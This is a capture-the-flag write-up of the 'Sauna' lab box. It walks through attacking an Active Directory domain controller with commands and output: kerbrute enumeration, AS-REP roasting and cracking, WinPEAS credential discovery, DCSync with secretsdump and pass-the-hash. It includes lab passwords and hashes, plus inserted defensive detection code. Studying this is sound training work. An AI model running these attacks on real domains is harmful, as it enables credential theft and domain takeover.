HTB-Sauna

Box Info

OS: Windows
Difficulty: Easy

Nmap

[root@kali] /home/kali/Sauna  
❯ nmap Sauna.htb -sV -T4 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Add EGOTISTICAL-BANK.LOCAL to /etc/hosts.

Crack Password

The About page of the website lists several team members:

Fergus Smith
Shaun Coins
Hugo Bear 
Bowie Taylor 
Steven Kerb 
Sophie Driver 

Here a tool (username-anarchy) is used to generate the likely username formats for these names:

[root@kali] /home/kali/Sauna/username-anarchy (master) ⚡ 
❯ cat usernames.txt 
fergus
fergus.smith
ferguss
fsmith
shaun
shaun.coins
shaunc
scoins
hugo
hugo.bear
hugob
hbear
bowie
bowie.taylor
bowiet
btaylor
steven
steven.kerb
stevenk
skerb
sophie
sophie.driver
sophied
sdriver

Use kerbrute to check which of these usernames actually exist in the domain:

[root@kali] /home/kali/Sauna  
❯ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL usernames.txt --dc EGOTISTICAL-BANK.LOCAL

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1)  Ronnie Flathers @ropnop

  Using KDC(s):
  EGOTISTICAL-BANK.LOCAL:88

  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
  Done! Tested 24 usernames (1 valid) in 1.049 seconds

Only fsmith exists. Next, check whether Kerberos pre-authentication is required for these accounts (an account with pre-auth disabled hands out an AS-REP that can be cracked offline):

[root@kali] /home/kali/Sauna  
❯ impacket-GetNPUsers -usersfile usernames.txt -no-pass -dc-ip "10.10.xx.xx" EGOTISTICAL-BANK.LOCAL/

$krb5asrep$23$fSmith@EGOTISTICAL-BANK.LOCAL:2bf051fe5d01a87bb394e35afeb5fb52$9109680d602a2ee95749b1c7c8eb999526aaa633047a593d78442d74949dc97d2b565d61ffee5f92ed51a9aa4486561ad901cd7ade464bed9696a10a40fcccabe87883a59903ac99a03e65c16101bf4083dee0e86691cb2060a29a94c983acc7adf6bc16a1abc6fa3d46cea8eb43a1404446698fe5dxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
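From the defender's side, the kerbrute userenum burst and the AS-REP roast above both leave traces in the domain controller's Security log (event 4768) and in the account's userAccountControl attribute. The following is an added example, not part of the writeup, that implements those three checks over constructed sample data; the account list, the 4768 records and the threshold are assumptions made for illustration.

```python
from collections import Counter

DONT_REQ_PREAUTH = 0x400000          # userAccountControl bit GetNPUsers relies on
ACCOUNTDISABLE = 0x2
RC4_HMAC = 0x17                      # etype 23, the "$krb5asrep$23$" prefix above
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6    # 4768 Status for a user that does not exist

# Constructed LDAP audit rows: (sAMAccountName, userAccountControl)
ACCOUNTS = [
    ("fsmith", 0x410200),     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    ("hsmith", 0x10200),
    ("svc_loanmgr", 0x10200),
    ("oldsvc", 0x410202),     # pre-auth off but ACCOUNTDISABLE set: not roastable
]

# Constructed Security-log 4768 records, keyed as in the event XML
EVENTS = [
    {"TargetUserName": "fsmith", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "Status": 0x0, "IpAddress": "10.10.14.5"},
    {"TargetUserName": "hsmith", "PreAuthType": 2, "TicketEncryptionType": 0x12,
     "Status": 0x0, "IpAddress": "10.10.10.7"},
] + [  # a burst of unknown-principal failures from one host: kerbrute's footprint
    {"TargetUserName": u, "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "Status": 0x6, "IpAddress": "10.10.14.5"}
    for u in ("fergus", "shaun", "hugo", "bowie", "steven", "sophie") * 4
]

def roastable_accounts(accounts):
    """Enabled accounts with 'Do not require Kerberos preauthentication' set."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]

def asrep_roast_hits(events):
    """Successful TGT requests with no pre-auth and RC4: an AS-REP hash was handed out."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["Status"] == 0 and e["PreAuthType"] == 0
            and e["TicketEncryptionType"] == RC4_HMAC]

def enumeration_sources(events, threshold=10):
    """Source IPs with many unknown-user failures: kerbrute-style username enumeration."""
    per_ip = Counter(e["IpAddress"] for e in events
                     if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in per_ip.items() if n >= threshold}

if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(ACCOUNTS))
    print("AS-REP roast:", asrep_roast_hits(EVENTS))
    print("userenum sources:", enumeration_sources(EVENTS))
```

Clearing the DONT_REQ_PREAUTH bit on the account removes the finding entirely; the event checks are what catches it in the meantime.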

Crack the AS-REP hash with John the Ripper:

[root@kali] /home/kali/Sauna  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

xxxxxxxxxxxxx   ($krb5asrep$23$fSmith@EGOTISTICAL-BANK.LOCAL)     

Finally, log in with Evil-WinRM using the recovered password and grab user.txt.

Privilege Escalation

Bloodhound

Add SAUNA.EGOTISTICAL-BANK.LOCAL to /etc/hosts.

[root@kali] /home/kali/Sauna  
❯ bloodhound-python -u fsmith -p "Thestrokes23" -d EGOTISTICAL-BANK.LOCAL -ns 10.10.xx.xx -c All
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 32S

BloodHound shows a user that can perform DCSync: SVC_LOANMGR.

Both users are in the same group, but there is no direct path from fsmith to svc_loanmgr.

Winpeas

I downloaded winPEASx64.exe for this.

It found AutoLogon credentials on the target:

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  MoneymakesthXXXXXXXXXXX

With the svc_loanmgr credentials in hand, a DCSync attack is now possible.

DCSync

Use impacket-secretsdump to impersonate a domain controller and pull the hashes from the DC:

[root@kali] /home/kali/Sauna  
❯ impacket-secretsdump 'EGOTISTICAL-BANK.local/svc_loanmgr:Moneymakestheworldgoround!'@10.10.xx.xx
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaxxxxxxxxxxx:823452073d75b9dxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
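The BloodHound finding above (svc_loanmgr can DCSync) comes down to ACEs on the domain object granting the DS-Replication-Get-Changes extended rights, and the secretsdump run leaves event 4662 control-access records on the DC. The following added example, not part of the writeup, shows both the ACL audit that surfaces such a principal and the 4662 detection logic; the ACE list, the event records and the allow-list of legitimate replicators are constructed for illustration.

```python
import re

# The extended rights that together make up DCSync (DRSUAPI replication)
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
# Principals that legitimately replicate: the DC itself and the DC groups (assumed)
ALLOWED = {"Domain Controllers", "Enterprise Domain Controllers", "SAUNA$"}

# Constructed ACEs on the domain object: (trustee, ObjectType GUID)
DOMAIN_ACES = [
    ("Domain Controllers", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("svc_loanmgr", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ("svc_loanmgr", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("fsmith", "00000000-0000-0000-0000-00000000beef"),  # placeholder: unrelated right
]
# Constructed Security-log 4662 records, as written while secretsdump replicates
EVENTS_4662 = [
    {"SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "fsmith", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-00000000beef}"},
]

def dcsync_capable(aces, allowed=ALLOWED):
    """Trustees outside the allow-list that hold any replication extended right."""
    found = {}
    for trustee, guid in aces:
        if trustee not in allowed and guid.lower() in REPL_RIGHTS:
            found.setdefault(trustee, set()).add(REPL_RIGHTS[guid.lower()])
    return {t: sorted(r) for t, r in found.items()}

def dcsync_events(events, allowed=ALLOWED):
    """4662 control-access (0x100) events from non-DC accounts naming a replication GUID."""
    hits = []
    for e in events:
        if e["SubjectUserName"] in allowed or int(e["AccessMask"], 16) & 0x100 == 0:
            continue
        rights = [REPL_RIGHTS[g.lower()] for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPL_RIGHTS]
        if rights:
            hits.append((e["SubjectUserName"], rights[0]))
    return hits
```

The ACL check is the preventive control (remove the rights from svc_loanmgr); the 4662 check only fires once the replication has already happened.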

Log in through evil-winrm with the Administrator hash (pass-the-hash) and grab root.txt.

Summary

User: Guess usernames from the staff listed on the website, using username-anarchy to generate the common username formats, then obtain the hash of an account with Kerberos pre-authentication disabled, crack it and log in.

Root: BloodHound analysis shows that a DCSync attack is possible, but that account is not reachable from the current user; the only option is to upload WinPEAS to inspect the system, which reveals an AutoLogon password, and from there perform the DCSync.
